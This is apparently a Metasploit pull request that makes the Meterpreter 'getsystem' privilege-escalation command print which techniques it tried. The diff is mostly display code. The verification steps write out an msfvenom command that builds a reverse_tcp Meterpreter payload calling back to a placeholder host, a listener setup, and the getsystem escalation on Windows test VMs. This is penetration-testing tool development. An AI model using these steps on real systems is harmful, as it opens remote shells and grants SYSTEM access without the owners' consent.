### PR TITLE
Make getsystem more verbose

### DIFF
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
@@ -26,9 +26,9 @@ class Console::CommandDispatcher::Priv::Elevate
   ELEVATE_TECHNIQUE_DESCRIPTION =
     [
       "All techniques available",
-      "Service - Named Pipe Impersonation (In Memory/Admin)",
-      "Service - Named Pipe Impersonation (Dropper/Admin)",
-      "Service - Token Duplication (In Memory/Admin)"
+      "Named Pipe Impersonation (In Memory/Admin)",
+      "Named Pipe Impersonation (Dropper/Admin)",
+      "Token Duplication (In Memory/Admin)"
     ]
 
   #
@@ -53,11 +53,10 @@ class Console::CommandDispatcher::Priv::Elevate
   #
   def translate_technique_index(index)
     translation = ''
-    desc = ELEVATE_TECHNIQUE_DESCRIPTION.dup
-    desc.each {|e| e.gsub!(/^Service - /, '')}
 
     case index
     when 0
+      desc = ELEVATE_TECHNIQUE_DESCRIPTION.dup
       desc.shift
       translation = desc
     else

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
@@ -17,17 +17,20 @@ class Console::CommandDispatcher::Priv::Elevate
 
   include Console::CommandDispatcher
 
-  ELEVATE_TECHNIQUE_NONE					= -1
-  ELEVATE_TECHNIQUE_ANY					= 0
-  ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE		= 1
-  ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2	= 2
-  ELEVATE_TECHNIQUE_SERVICE_TOKENDUP		= 3
+  ELEVATE_TECHNIQUE_NONE               = -1
+  ELEVATE_TECHNIQUE_ANY                = 0
+  ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE  = 1
+  ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2 = 2
+  ELEVATE_TECHNIQUE_SERVICE_TOKENDUP   = 3
 
-  ELEVATE_TECHNIQUE_DESCRIPTION = [ 	"All techniques available",
-                    "Service - Named Pipe Impersonation (In Memory/Admin)",
-                    "Service - Named Pipe Impersonation (Dropper/Admin)",
-                    "Service - Token Duplication (In Memory/Admin)"
-                  ]
+  ELEVATE_TECHNIQUE_DESCRIPTION =
+    [
+      "All techniques available",
+      "Service - Named Pipe Impersonation (In Memory/Admin)",
+      "Service - Named Pipe Impersonation (Dropper/Admin)",
+      "Service - Token Duplication (In Memory/Admin)"
+    ]
+
   #
   # List of supported commands.
   #
@@ -42,6 +45,26 @@ class Console::CommandDispatcher::Priv::Elevate
   #
   def name
     "Priv: Elevate"
+  end
+
+
+  #
+  # Returns the description of the technique(s)
+  #
+  def translate_technique_index(index)
+    translation = ''
+    desc = ELEVATE_TECHNIQUE_DESCRIPTION.dup
+    desc.each {|e| e.gsub!(/^Service - /, '')}
+
+    case index
+    when 0
+      desc.shift
+      translation = desc
+    else
+      translation = [ ELEVATE_TECHNIQUE_DESCRIPTION[index] ]
+    end
+
+    translation
   end
 
 
@@ -73,17 +96,29 @@ class Console::CommandDispatcher::Priv::Elevate
     }
 
     if( technique < 0 or technique >= ELEVATE_TECHNIQUE_DESCRIPTION.length )
-      print_error( "Technique '#{technique}' is out of range." );
+      print_error( "Technique '#{technique}' is out of range." )
       return false;
     end
 
-    result = client.priv.getsystem( technique )
+    begin
+      result = client.priv.getsystem( technique )
+    rescue Rex::Post::Meterpreter::RequestError => e
+      print_error("#{e.message} The following was attempted:")
+      translate_technique_index(technique).each do |desc|
+        print_error(desc)
+      end
+      elog("#{e.class} #{e.message} (Technique: #{technique})\n#{e.backtrace * "\n"}")
+      return
+    end
 
     # got system?
     if result[0]
-      print_line( "...got system (via technique #{result[1]})." );
+      print_line( "...got system via technique #{result[1]} (#{translate_technique_index(result[1]).first})." )
     else
-      print_line( "...failed to get system." );
+      print_line( "...failed to get system while attempting the following:" )
+      translate_technique_index(technique).each do |desc|
+        print_error(desc)
+      end
     end
 
     return result


### PR DESCRIPTION
Resolves #4401
## Verification
- [x] Start a Windows XP VM
- [x] Start a Windows 8.1 VM
- [x] Do: `./msfvenom -p windows/meterpreter/reverse_tcp lhost=[IP] -f exe -o payload.exe`
- [x] Copy payload.exe to both XP and Win 8.1
- [x] Start msfconsole
- [x] Do: `use multi/handler`
- [x] Do: `set exitonsession false`
- [x] Do: `run -j`
- [x] Double click on payload.exe on both VMs
- [x] In the msf prompt, do: `sessions -i 1`
- [x] Do `getsystem`
- [x] Back to the msf prompt
- [x] Do: `sessions -i 2`
- [x] Do: `getsystem`

If you are on XP, the getsystem command should print:

```
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
```

If you're on Win 8.1, the getsystem command should print:

```
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
```
